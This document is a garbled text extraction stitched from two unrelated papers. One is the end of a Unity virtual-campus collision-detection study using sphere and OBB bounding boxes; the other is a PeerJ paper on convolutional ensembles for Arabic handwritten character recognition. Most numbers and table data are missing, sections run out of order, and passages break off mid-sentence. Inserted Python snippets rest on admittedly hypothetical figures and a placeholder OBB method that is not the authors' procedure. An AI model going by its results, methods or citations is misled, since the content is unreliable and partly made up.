on the premise of obtaining the same, correct detection results, the experiment compares the collision detection time of the two algorithms in the same collision scene. according to this evaluation function, when the two algorithms perform collision detection, the number of basic geometric primitive pairs involved ($N_p$) is the same, and the cost of testing a pair of primitives ($C_p$) is the same. the same scene is used in the comparison experiment and the motion track of the objects is the same, so the number of nodes that need to be updated after the objects move ($N_u$) is also the same for both algorithms. for this algorithm, the cost of updating a double bounding box ($C_u$) is essentially the cost of updating an inner bounding box. therefore, the total cost $T$ of the two algorithms differs in the cost $N_v C_v$ of the bounding volume overlap tests and the cost $C_u$ of updating a bounding volume. the algorithm constructs a sphere and an obb for the inner layer of the binary tree nodes of the teapot and the cylinder. the intersection test between a sphere and an obb is similar to the obb test but quicker and simpler, requiring at most only three comparisons. the sphere bounding box is also cheaper to update than the obb, so this algorithm is less expensive to update a bounding box than the rapid algorithm.
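to make the comparison concrete, the evaluation function can be computed for both algorithms under the conditions above (equal $N_p$, $C_p$, $N_u$). the unit costs below are purely hypothetical placeholders, chosen only to show that a smaller per-test cost $C_v$ and a smaller update cost $C_u$ directly lower the total cost $T$.

```python
def total_cost(n_v, c_v, n_p, c_p, n_u, c_u):
    """Evaluation function T = Nv*Cv + Np*Cp + Nu*Cu."""
    return n_v * c_v + n_p * c_p + n_u * c_u

# hypothetical, illustrative figures only; Np, Cp and Nu are shared by both.
shared = dict(n_p=2000, c_p=1.0, n_u=500)
t_hybrid = total_cost(n_v=10000, c_v=0.6, c_u=0.4, **shared)  # sphere/OBB inner nodes
t_rapid = total_cost(n_v=10000, c_v=1.0, c_u=1.0, **shared)   # OBB-only tree
print(t_hybrid, t_rapid, t_hybrid < t_rapid)                  # 8200.0 12500.0 True
```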
the experimental results of the two algorithms are shown in table , and the efficiency comparison of the algorithms is shown in figure . table i. collision detection time comparison, with columns: triangle overlap number, this paper's algorithm time-consuming/ms, rapid algorithm time-consuming/ms, and efficiency lifting multiple (the numeric entries are not recoverable from the extracted text). figure . time contrast diagram of algorithm collision detection (collision detection time/ms versus triangle overlap number for this paper's algorithm and the rapid algorithm). the experimental results show that, for the same number of overlapping triangles, the algorithm reduces the collision detection time and makes the collision response between objects faster than the rapid algorithm, which improves the realism of the scene when objects collide in real time. because the various bounding-box collision detection algorithms are developed on top of the unity d engine, software developers only need to add the appropriate colliders to objects to complete the corresponding collision detection test, without needing to write the collision detection algorithm themselves, which effectively improves the efficiency of software development [ ]. in unity, the main colliders are static colliders such as the box collider, sphere collider, capsule collider and wheel collider, plus rigid body colliders for dynamic objects. in this system, a rigid body collider is added to the roaming role, and various static colliders are added to the objects, such as buildings, flowers and trees, and the ground. the information processing of a collision is realized through the collision-enter, collision-exit and collision-stay callback functions in a script [ ], and a function that pops up a gui interface is added so that the specific gui interface is triggered in the collision-enter callback. the collision function of the system can also be tested through the game interface in unity. when a character collides with a building, the script triggers a collision event because a collision body has been added to the specific building attachment; a pop-up information window for the corresponding building is then shown, and the result is shown in figure . figure . the information window displayed after the collision. we can see that the mixed hierarchical bounding box collision detection algorithm based on the encircling ball and the obb bounding box also achieves very good results in developing the system. it not only enhances the realism of the scene, but also completes the triggering of the window pop-up event through the detection of collision events, which enhances the interactivity and makes the system more user-friendly. v. conclusion this paper studies a virtual campus roaming system based on virtual reality technology; through the whole development process of the system, the implementation principle of the collision detection technology and the hybrid bounding box algorithm based on the encircling ball and the oriented bounding box are emphasized. acknowledgment fund support: shaanxi education department special fund, project number: shaanxi education finance (gsysj ). references [ ] tang cui-fang, design and implementation of campus roaming system based on virtual reality technology [j], science and technology innovation herald, , , - . [ ] han lei, research on virtual building roaming and collision detection based on unity d [j], academic exchange, , , - + .
[ ] wang yu, research and application of collision detection in virtual roaming system [j], electronic design engineering, , , – + . [ ] wang feng-qin, research on virtual training system of rock drilling platform based on unity d [d], shijiazhuang tiedao university, shijiazhuang, . [ ] li zhen, research on optimization algorithm for rigid body collision detection in virtual scene [d], jilin agricultural university, changchun, . [ ] wang shuang, cheng yong-dang, kong fan-jin, and yang bin, a survey of virtual reality [j], science & technology vision, , , + . [ ] zhang shao-bo, research on key technology of human-computer interaction in immersive virtual reality [d], chongqing university of posts and telecommunications, chongqing, . [ ] zhang jia-jia, optimization simulation of collision detection in d virtual environment [j], computer simulation, , , - . [ ] lai quan, cha mu-ga, jineerdemutu, and jinhugejiletu, development and research of d visualized campus system based on unity d platform [j], sci-tech information development & economy, , , - . [ ] wang lei, the research of collision detection technology based on hybrid bounding box and its application in web d roaming [d], shanghai university, shanghai, . 1) spheres: the bounding sphere is a relatively simple bounding box with poor tightness. as the outer sphere of a geometric object it produces too much redundant space for more concave objects, so the encircling ball can report a collision even when the objects have not actually touched. to illustrate the construction process, assume the geometric object is e and let se denote the set of all the most basic geometric elements (such as triangles and circles) in the object. the calculation method of the encircling ball is simpler than that of the other bounding boxes: the average of the three coordinate sets of all the elements in se (the coordinates of the intersection of the triangle angle bisectors, or the circle centre coordinates) is taken as the centre of the bounding sphere, denoted c (x, y, z); then the distances between the centre and each basic geometric element in the object e are compared, and the maximum value is the radius of the bounding sphere, denoted r. thus, the parameters required to record a ball are far fewer than for the other encircling boxes: a sphere is fully described by its centre (three parameters) and its radius (one parameter). the intersection test between bounding balls is also relatively simple: it is only necessary to compare the distance between the two sphere centres with the sum of their radii. the specific method is as follows: assuming the centres and radii of the two surrounding spheres are s1 (x1, y1, z1), r1 and s2 (x2, y2, z2), r2, the two bounding balls intersect if the distance between the centres does not exceed the sum of the radii; otherwise they do not intersect. the detailed expression of this inequality is sqrt((x1 - x2)^2 + (y1 - y2)^2 + (z1 - z2)^2) <= r1 + r2. 2) obb (oriented bounding box): the obb is the minimal rectangular box that contains a geometric object and may take any orientation in the coordinate system. the key to the construction is how to find the best orientation of the box and determine the minimal reachable length and width. compared with the encircling ball, the construction of the obb is considerably more difficult, and the concrete construction method of the obb is as follows.
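the body text for the obb construction step does not survive cleanly at this point in the extraction, so the sketch below should be read as a placeholder rather than the authors' exact procedure: it follows the widely used covariance-based construction, in which the eigenvectors of the vertex covariance matrix supply the box axes and the extents come from projecting the vertices onto those axes.

```python
import numpy as np

def build_obb(vertices):
    """Covariance-based OBB, a commonly used construction assumed here for
    illustration. vertices is an (n, 3) array of points on the object."""
    pts = np.asarray(vertices, dtype=float)
    mean = pts.mean(axis=0)
    centred = pts - mean
    # eigenvectors of the covariance matrix give the box orientation
    cov = np.cov(centred, rowvar=False)
    _, axes = np.linalg.eigh(cov)          # columns are orthonormal axes
    # project every vertex onto the axes to find the extents along each axis
    local = centred @ axes
    lo, hi = local.min(axis=0), local.max(axis=0)
    centre = mean + axes @ ((lo + hi) / 2.0)
    half_sizes = (hi - lo) / 2.0
    return centre, axes, half_sizes

# usage: centre, axes, half_sizes = build_obb(mesh_vertices)
```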
construction of hierarchical encircling box tree iv. system application and test results v. conclusion acknowledgment references submitted june accepted september published october corresponding author iam palatnik de sousa, iam.palat@gmail.com academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright palatnik de sousa distributed under creative commons cc-by . open access convolutional ensembles for arabic handwritten character and digit recognition iam palatnik de sousa department of electrical engineering, pontifícia universidade católica do rio de janeiro, rio de janeiro, brazil abstract a learning algorithm is proposed for the task of arabic handwritten character and digit recognition. the architecture consists on an ensemble of different convolutional neural networks. the proposed training algorithm uses a combination of adaptive gradient descent on the first epochs and regular stochastic gradient descent in the last epochs, to facilitate convergence. different validation strategies are tested, namely monte carlo cross-validation and k-fold cross validation. hyper-parameter tuning was done by using the madbase digits dataset. state of the art validation and testing classification accuracies were achieved, with average values of . % and . % respectively. the same algorithm was then trained and tested with the ahcd character dataset, also yielding state of the art validation and testing classification accuracies: . % and . % respectively. subjects algorithms and analysis of algorithms, artificial intelligence, computer vision, data mining and machine learning keywords offline character recognition, arabic handwriting recognition, convolutional neural networks, deep learning introduction offline handwriting recognition refers to the task of determining what letters or digits are present in a digital image of handwritten text. it is considered a subtask of the more general optical character recognition. however, in many applications, from reading bank checks to postal mail triage, offline recognition plays a key role, greatly motivating the development of accurate and fast classification algorithms (abdelazeem, ). the domain of arabic handwriting recognition (ahr), however, has only been explored in depth more recently. younis ( ) notes that ahr suffers from slow development compared to handwriting recognition in other languages. he further mentions that arabic characters contain a specific set of challenges that make the task more difficult. such difficulties include the positioning of dots relative to the main character, the variability caused by the use of the characters in multiple countries and different areas of knowledge and work, among others. given this issue, using datasets that represent this variability on a large number of images is essential. how to cite this article palatnik de sousa ( ), convolutional ensembles for arabic handwritten character and digit recognition. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:iam.palat@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. in the previous decade, a dataset equivalent to mnist (lecun et al., ) was developed to allow for a more direct comparison of the performance of classification algorithms on latin and arabic digits. 
this dataset was named madbase (abdleazeem & el-sherif, ), and consists of , images of arabic digits, written by participants from different areas of work and backgrounds. these are divided into a training set of , images and a test set of , . this seems to be the largest dataset for this task available in literature. this makes it an ideal choice for training the network and fine-tuning parameters. furthermore, as discussed in detail on the next section, previous results obtained from this dataset allow for comparison with the results presented in this manuscript. it is worth noting that this dataset is a modified version of an equivalent dataset called adbase, which contains the same images with a different image size. to create madbase, adbase images were resized and transformed from binary to grayscale to be equivalent to mnist. while the madbase dataset deals with digits, the arabic handwritten character dataset (ahcd) (el-sawy, loey & hazem, ) includes , images of isolated characters divided in training set of , and a test set of , images. this seems to be the largest dataset available for this classification task. regarding previous results, mahmoud ( ) presented a method for recognition of handwritten arabic digits based on extraction of gabor-based features and support vector machines (svms). the dataset used in this case contained , samples provided by writers. the average classification accuracy rates obtained were of . % and . % using three scales & five orientations and four scales & six orientations respectively. abdleazeem & el-sherif ( ) applied several classification methods to the madbase dataset. their best result was obtained with a radial basis function support vector machine (rbf svm), with which a two stage classification was performed. in the first stage several customized features were extracted from a similar dataset by the researchers, and then used as input for the rbf svm. the classifier was tuned to maximize the classification accuracy, which had a final value of . %. this value corresponds to the best parameter combination. el melhaoui et al. ( ) used a small dataset of digit images to obtain a % recognition rate using a technique based loci characteristics. pandi selvi & meyyappan ( ) proposed an approach for arabic digit recognition using neural networks and training through backpropagation. the dataset used in this case was also small, and the classification accuracy obtained was %. takruri, al-hmouz & al-hmouz ( ) obtained a test classification accuracy of % using a dataset of , digit images, by using a three level classifier consisting on svm, fuzzy c means and unique pixels. salameh ( ) presented two methods for enhancing recognition of arabic handwritten digits. the methods combine fuzzy logic pattern classification to counting the number of ends of the digit shapes to obtain a classification test accuracy of % for some fonts. alkhateeb & alseid ( ), using the adbase dataset, obtained an . % classification accuracy by using dynamic bayesian networks (dbn). palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. although it is hard to compare results provided by training with different datasets, the larger datasets seem to result in worse classification accuracies, most likely since they cover a larger sample of the variability of styles in handwriting. 
this further indicates that using the largest, more challenging datasets available, with the largest number of writing participants, is an ideal choice, as was done for this manuscript. loey, el-sawy & el-bakry ( ) used stacked autoencoders on the madbase dataset to obtain a classification accuracy of . %. mudhsh & almodfer ( ) obtained a validation accuracy of up to . % on the madbase dataset by usage of dropout regularization and data augmentation, and an architecture inspired by the vggnet convolutional neural network (cnn) (simonyan & zisserman, ). importantly, they mention in the text that this validation accuracy does not hold for the test set, without mentioning explicitly the test accuracy. the validation method was a -fold cross-validation. they also tested the performance of the algorithm on a dataset of , images of characters, obtaining a validation accuracy of . %. again they mention that this validation accuracy does not hold for the test set, without clearly stating the test accuracy. younis ( ) obtained an accuracy of . % on the previously mentioned ahcd dataset, by use of a deep cnn with batch normalization and learning rate scheduling. the general trend observed in these works is that feature extraction aids in the classification task. this makes the choice of convolution based networks straightforward, as these architectures are precisely constructed to be specialized feature extractors. it seems to make sense that cnns have the best results so far for this task, in these previously reported results. in this work, the best previous ideas and results are incremented further by usage of some changes in architecture and in the training procedure. namely both the vggnet inspiration and a batch normalized cnn are employed, combining their classifications through ensemble averaging. the details of this method are described in the next section. materials and methods the code for defining and training the networks was implemented in python, using the keras framework with tensorflow backend. the key aspects of the classification system are, namely, the selection and preparation of the datasets, the network architecture, the training schedule, the validation strategy, the data augmentation, and the ensemble selection. each of these is explained more in detail below. selection and preparation of datasets the datasets chosen for training and parameter tuning were the madbase and ahcd datasets described in the previous section. for both datasets, the networks were trained from scratch, although most of the parameter tuning was done with madbase, since it is a much larger dataset. since the images in both datasets are already prepared for training, the only pre- processing done was converting the value of each pixel to float format and dividing by for normalization purposes. figure shows some examples from each dataset. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example images from the madbase and ahcd datasets. full-size doi: . /peerjcs. /fig- network architecture the classification method consists on an ensemble of four networks. these are actually two networks, each trained with two different strategies (with data augmentation and without). rather than choosing whether to apply augmentation or not, both options are used and the results are gathered in an ensemble classifier. this also allows for a direct comparison of the predictive power of each individual network against the results of the ensemble. 
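the way the four members are combined can be sketched compactly. the snippet below is an illustrative keras/numpy sketch rather than the released code (which ships as a supplemental notebook); it assumes four already-trained models and simply averages their softmax outputs, which is the averaging variant the ensemble ultimately uses, and the member variable names in the usage comment are placeholders.

```python
import numpy as np

def ensemble_predict(models, x):
    """Average the softmax outputs of the member networks and return both
    the averaged class probabilities and the predicted class labels."""
    # each model.predict(x) has shape (n_samples, n_classes)
    probs = np.mean([m.predict(x) for m in models], axis=0)
    return probs, probs.argmax(axis=1)

# usage, with placeholder names for the four trained members described below:
# probs, labels = ensemble_predict([vgg_adapted, vgg_adapted_aug,
#                                   regu, regu_aug], x_test)
```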
for brevity, the ensemble of four networks will be called ens throughout the manuscript. the first type of cnn used in the ensemble was inspired by the vgg network, readily implemented for keras. this architecture couldn’t be used directly, however, because it assumes the inputs are images of three channels (rgb) of default size by pixels, and minimum size by pixels. images below this size are too small to pass through the five convolution blocks of the network. the images of madbase and ahcd have dimensions of by pixels and by pixels, respectively. furthermore they are grayscale images with only channel. the solution to this was adapting the vgg architecture by removing the fifth convolution block, and creating three channel images from the one channel images by simply stacking the same single channel three times. another adaptation added was a dropout layer before the final dense softmax layer, and only using two dense layers instead of three. the resulting layer architecture, intended for these grayscale images, will be called vgg on this manuscript, for brevity. the second type of cnn used was designed from scratch in this work to include the dropout and batch normalization regularizations within both the feature extraction convolution blocks as well as the dense fully connected classification block. the architecture was adapted after several experiments to be as simple as possible, allowing for fast training, while still providing robust classifications. for brevity this architecture that includes palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure diagrams of vgg and regu. conv refers to convolutional layers, pool to max-pooling layers, full to dense fully connected layers and norm to batch normalization layers. purple round rect- angles correspond to convolutional feature extraction blocks, and orange round rectangles correspond to fully connected classification blocks. more details about the architectures can be found on a suplemental file along the manuscript. full-size doi: . /peerjcs. /fig- both types of regularizations (dropout and batch normalization) will be termed regu throughout the rest of the manuscript. figure contains illustrative schemes of vgg and regu. namely, vgg contains four convolution blocks and one fully connected block. the convolution filters used in all convolution layers have size × . the number of filters used in the first block is , and doubles on every further block up to on block . relu activation was used for the convolution layers, as well as same padding. the max pooling elements had a size of × . the fully connected block has two dense layers. the first, with relu activation, has neurons. the second, with softmax activation, has neurons for the case of madbase and for the case of ahcd. a . dropout rate was used. regarding regu, there are two convolution blocks and one fully connected block. the first convolution block has two convolution layers with filters of size × and relu activation. a . dropout rate was used, followed by batch normalization. the max pooling elements had a size of × . the second convolution block is identical, except for the number of convolution filters, which is and for a batch normalization applied at the start of the block. the fully connected block in this case has batch normalizations before each dense layer. the dense layers are identical to the case of vgg . 
the first has neurons and relu activation, and the second has softmax activation and neurons for madbase and palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. neurons for ahcd. a . dropout rate was used. these descriptions are summarized in a supplemental file that can be used for building this architecture on keras. training schedule the literature review and previous works cited show that, in general, the training for ahr tasks is done with optimizers such as stochastic gradient descent (sgd) or with an adaptive method such as adam (kingma & ba, ), often paired with learning rate schedules. however, a generalization gap between adam and sgd has been observed recently for many tasks involving image classification and language modelling (keskar & socher, ). it has been indicated that that sgd finds more optimal lower minimums for the loss function, despite converging at a much lower rate than adam. according to keskar and socher, this favors the usage of adam for the first epochs of training, providing a fast convergence to lower losses, with a swap to sgd for a more fine convergence at the end of the training. this swapping strategy closed the generalization gap on the tests performed by keskar and socher. a few experiments were performed with vgg and regu using adam, sgd and this adam and sgd swapping strategy. the initial results confirmed the observations of keskar and socher, and as such the swapping strategy was adopted for the rest of the experiments. namely, the number of epochs before and after the swap was treated as a parameter to be tuned, and eventually values of epochs of adam training followed by epochs of sgd training seemed to provide the best results. for the epochs of sgd training, inspired by previous works that used learning rate scheduling, a strategy of reducing the learning rate periodically was adopted. specifically, this only happened if and when the test loss reached a plateau. there is an already implemented function in keras, reduceonlrpplateau, for this purpose. whenever a plateau was reached, the learning rate was multiplied by a factor of . . for this task in particular, the choice of this training strategy produced better results when compared to use of sgd or adam individually for epochs. it is the first time such a strategy has been employed for the task of arabic handwritten character and digit recognition. it is also worth noting that using sgd individually didn’t reliably give similar results to the swapping strategy, even when more training epochs were allowed, as sgd seemed to have trouble converging on the first few epochs of training, remaining at high training and validation and loss values. the loss function used was categorical cross-entropy, which is adequate given the softmax activation of the last dense layer of both vgg and regu. mean square error was also tried in initial experiments, but it consistently resulted in worse performance. validation strategy both datasets used (madbase and ahcd) provide separate test sets, but not separate validation sets. if the test sets were to be used for validation purposes, this would make the classifier heavily biased towards that specific test set. it would then be difficult to verify how good the classifier is at generalizing. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
as such, using part of the training set for validation is the ideal approach. with the validation set all the parameters were tuned to find the highest values of validation accuracy, and only after this training was done, and no other changes were to be effected to ens , the testing set was used for evaluation. however this means that the validation strategy chosen for parameter tuning could affect the generalization capabilities of the network. furthermore, there is randomness present in the training procedure, whether in weight initialization, in the data augmentation method, the dropout regularization or other aspects. this suggests that multiple runs are necessary to obtain an average behavior and performance of the classifier. the most commonly applied validation methodologies that use multiple runs are monte carlo cross-validation (mccv) (xu & liang, ) and k-fold cross-validation (kcv) (refaeilzadeh, tang & liu, ). in mccv, a subset of the training set is chosen at random and used as a validation set. this is repeated as many times as necessary, in general ensuring that the validation set always has the same size. in kcv the training set is divided into k subsets (named folds) of the same size, and each fold is used as a validation set, while all of the other folds are gathered as a training set. a very commonly used value for k is . generally speaking there isn’t a definitive answer as to which of these two methodologies is best for a given task, as this is highly dependent on the particularities of each dataset. mudhsh & almodfer ( ), for instance, have used -fold cross validation in their study of madbase. for this present manuscript, both mccv and kcv were employed for the madbase dataset to give as much information as possible for fine-tuning the parameters, before the test set was used for evaluation. since the test set has , images for madbase, the mccv was implemented so that the validation sets also had , images. this means the training sets effectively had , images during training. a total of runs were performed in this manner, and the average performances were computed. for the kcv, a -fold cross-validation was used to allow for direct comparison with the results of mudhsh & almodfer ( ), but it must be noted that dividing the original training set of , into folds means each validation set has a size of , . since the size of the validation set can be adjusted by changing the value of k, and the test set size is fixed, a -fold validation was also performed (since this implies validation sets of size , , the same as the provided test sets). given the smaller size of ahcd, using -fold cross validation makes the validation sets too small compared to the test set, and as such only mccv was employed in that case, ensuring the validation and test sets had the same size. as with madbase, this cross-validation was repeated times. the results of the several runs with each method were averaged to allow for decision making regarding parameter tuning. once the best validation results were reached with ens , the test set was used for evaluation. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data augmentation the method of data augmentation has been used previously in ahr (mudhsh & almodfer, ). in the present study, data augmentation was applied to the training sets of both madbase and ahcd in some of the experiments. the purpose is to create a more varied dataset that could make the classifier more robust. 
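returning to the training schedule described above, the optimizer swap and the plateau-based learning-rate reduction are both straightforward to express in keras; note that the callback is ReduceLROnPlateau. the sketch below is illustrative only: the epoch counts, batch size, reduction factor and sgd settings are assumptions standing in for values elided in the text, and `model` is any keras model with a softmax output such as the ones described earlier.

```python
import tensorflow as tf

def train_with_optimizer_swap(model, x_train, y_train, x_val, y_val,
                              adam_epochs=20, sgd_epochs=80):
    # phase 1: adam for a fast initial drop in the loss
    model.compile(optimizer=tf.keras.optimizers.Adam(),
                  loss="categorical_crossentropy", metrics=["accuracy"])
    model.fit(x_train, y_train, validation_data=(x_val, y_val),
              epochs=adam_epochs, batch_size=128)

    # phase 2: swap to plain sgd for the finer, lower minimum, shrinking the
    # learning rate whenever the validation loss reaches a plateau
    reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(
        monitor="val_loss", factor=0.5, patience=3)  # factor/patience assumed
    model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=0.01),
                  loss="categorical_crossentropy", metrics=["accuracy"])
    model.fit(x_train, y_train, validation_data=(x_val, y_val),
              epochs=sgd_epochs, batch_size=128, callbacks=[reduce_lr])
    return model
```

recompiling the model keeps its weights while resetting the optimizer state, which is what the swap requires.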
since ens includes both the networks trained without and with data augmentation, the networks corresponding to the latter case will be named vgg _aug and regu_aug for disambiguation. the augmentation method used was the already implemented imagedatagenerator on keras, with zoom_range, height_shift_range and width shift range parameters equal to . . other parameters were also tested, but invariably led to a worse performance of the augmented classifiers. it is known that not all forms of augmentation are necessarily helpful for all tasks (mudhsh & almodfer, ), and the tree chosen yield the best results for these ahr architectures. the batch size of augmented images had a size of . ensemble selection once vgg , vgg _aug, regu and regu_aug were trained, the idea was to combine their predictions into an averaged ensemble classifier (simonyan & zisserman, ). the two main approaches that could be used for this include averaging the predictions of each of the networks that form ens , or using a maximum voting approach, where the biggest softmax probability between the four networks is taken as the answer. both methods were initially used, with averaging eventually showing a better performance overall. as such, the output softmax probabilities of ens are the average calculated from the outputs of vgg , vgg _aug, regu and regu_aug. roughly, the process of training the entire ensemble, took about h per run on the available hardware. gpu acceleration was used. weight initialization previous works in literature regarding ahr often don’t describe weight initialization strategies. for this study we have used glorot-normal initialization (glorot & bengio, ). on their work, glorot and bengio mention how this initialization often outperforms other normalized initializations. indeed, this came to be the standard initialization for the keras framework. for comparison, runs with he-normal, random normalized and all-zeroes initializations were performed. preliminary tests showed that the standard glorot-normal initialization yielded better results, and so this was kept throughout the rest of the runs. results the optimizer swapping strategy described in the previous section, combined with the learning rate scheduling, produces a consistent behavior of convergence of the loss function with the training epochs. in the first twenty epochs, the adam optimizer causes loss values to drop towards lower and more stable values, and on the next epochs sgd brings these values to a lower, nearly constant minimum. an example of this behavior can be seen in fig. , showing the plots for loss and accuracy over the training epochs. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of training and validation acurracy and loss as a function of training epochs. each of the four individual networks that compose ens are portrayed. up to the th epoch, under adam op- timization, the values gradually oscilate less. notably when swapping to sgd at epoch there is a slight improvement of performance (higher acurracy, lower loss), followed by a narrower convergence of the values. this behavior was consistent throughout all runs. full-size doi: . /peerjcs. /fig- table summary of results. averaged test and validation accuracies with different cross- validation strategies. entries in the table correspond to the individual networks (vgg , regu, vgg _aug and regu_aug) and ens . 
the table reports, for mccv and for the two kcv settings ( -fold and six-fold), the accuracy (%) and standard deviation (%), grouped into validation (madbase) and test (madbase) blocks, with one row per classifier: vgg , regu, vgg _aug, regu_aug and ens ; the numeric entries do not survive extraction. after the initial parameter tuning was performed with madbase, the experiments corresponding to the mccv runs, -fold runs and six-fold runs were performed. the averaged results are summarized in table . the full raw results of the runs, used to calculate these averages, are presented as a supplemental file along with the manuscript. interestingly, the only case where one of the individual networks outperformed the full ensemble was for one of the regu_aug results. furthermore, regu_aug consistently
the average test and validation accuracy values of ens are very promising and improve upon the presently available state of the art listed in ‘introduction’, for madbase. the best test accuracy result of . % indicates that ens is the first classifier to outperform the accuracy value of . % of the two stage rbf svm classifier by abdleazeem & el-sherif ( ) for this dataset. importantly, ens achieves this in a single stage classification, with no previous feature extraction. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion a method for offline arabic handwritten recognition was described in this manuscript. the system was trained and tested on the two largest available datasets of arabic digits and characters. the architecture used consisted of an ensemble averaging of four convolutional neural networks. of these four, two were inspired by vggnet and two were written from scratch using batch normalization and dropout regularization. each of these was trained twice: once with data augmentation, once without. the training used a swapping method where the first epochs use an adaptive optimizer (adam) and the last epochs use regular stochastic gradient descent. it further used learning rate scheduling if the loss decrease reached a plateau during the sgd training epochs. two validation strategies were considered: monte carlo cross-validation and k-fold cross-validation. for the latter, two values of k were used, one commonly used in literature, and one that ensures the test and validation sets have the same size for the madbase dataset. the results didn’t show a clear advantage of choosing either method for this dataset in particular. the use of a categorical cross-entropy loss function outperformed the use of a mean squared error function for the same purpose, possibly because of the choice of softmax activations for the final dense layer of the individual networks. glorot-normal weight initialization outperformed the other alternatives tested (he- normal, all-zero, random normalized). future works could test initializations more exhaustively, to see if there is a particular combination of initializations that yield better results for ahr, although the results so far seem to indicate that other aspects of the architecture and training are more relevant to the end result. the results obtained improve upon the state of the art both the madbase and ahcd datasets. the fact the ensemble averaging gives promising results suggests future projects could adapt other types of larger convolution based networks, or try different training strategies, while also adding them to ensemble averaging classifiers. other types of ensemble averaging, such as weighted averages, could be explored more in depth for this purpose as well. additional information and declarations funding this work was supported by the national council for scientific and technological development of brazil, through a phd scholarship. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: national council for scientific and technological development of brazil. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. 
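for reference, the two validation strategies whose dispersion is compared in the discussion above can be set up with standard scikit-learn splitters. this is a hedged sketch rather than the paper's code; the run count, fold count and validation-set size below are placeholders standing in for the values elided in the text.

```python
import numpy as np
from sklearn.model_selection import KFold, ShuffleSplit

def make_validation_splits(n_samples, strategy="mccv",
                           n_runs=10, val_size=10000, k=10, seed=0):
    """Return (train_idx, val_idx) pairs for either validation strategy."""
    idx = np.arange(n_samples)
    if strategy == "mccv":
        # monte carlo cv: repeatedly draw a random validation set of fixed size
        splitter = ShuffleSplit(n_splits=n_runs, test_size=val_size,
                                random_state=seed)
    else:
        # k-fold cv: partition the training set into k folds used in turn
        splitter = KFold(n_splits=k, shuffle=True, random_state=seed)
    return list(splitter.split(idx))
```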
author contributions • iam palatnik de sousa conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: there are three supplemental files. the text file includes relevant specific details about the network architectures used in the manuscript. the excel file includes the raw results from the experiments run in the manuscript. the ipynb file is the pthon code notebook. the raw data (specific details about the network architectures used, raw results from the experiments run and the python code notebook) is available as supplemental files. ahcd: https://www.kaggle.com/mloey /ahcd . madbase: https://www.kaggle.com/mloey /ahdd /. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdelazeem s. . comparing arabic and latin handwritten digits recognition problems. world academy of science, engineering and technology : – . abdleazeem s, el-sherif e. . arabic handwritten digit recognition. international journal of document analysis and recognition ( ): – doi . /s - - - . alkhateeb jh, alseid m. . dbn—based learning for arabic handwritten digit recognition using dct features. in: th international conference on computer science and information technology (csit). – . el melhaoui o, maroc m, el hitmy m, lekhal f. . arabic numerals recognition based on an improved version of the loci characteristic. international journal of computer applications ( ): – doi . / - . el-sawy a, loey m, hazem eb. . arabic handwritten characters recognition using convolutional neural network. wseas transactions on computer research : – . keskar ns, socher r. . improving generalization performance by switching from adam to sgd. arxiv preprint. arxiv: . . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . lecun y, bottou l, bengio y, haffner p. . gradient-based learning applied to docu- ment recognition. proceedings of the ieee ( ): – doi . / . . palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.kaggle.com/mloey /ahcd https://www.kaggle.com/mloey /ahdd / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. loey m, el-sawy a, el-bakry h. . deep learning autoencoder approach for handwritten arabic digits recognition. arxiv preprint. arxiv: . . mahmoud sa. . arabic (indian) handwritten digits recognition using gabor-based features. in: innovations in information technology, . iit . international conference. piscataway: ieee, – . mudhsh m, almodfer r. . arabic handwritten alphanumeric character recognition using very deep neural network. information ( ): doi . /info . refaeilzadeh p, tang l, liu h. . cross-validation. encyclopedia of database systems doi . / - - - - _ . salameh m. . arabic digits recognition using statistical analysis for end/conjunction points and fuzzy logic for pattern recognition techniques. world of computer science & information technology journal ( ). selvi pp, meyyappan t. . 
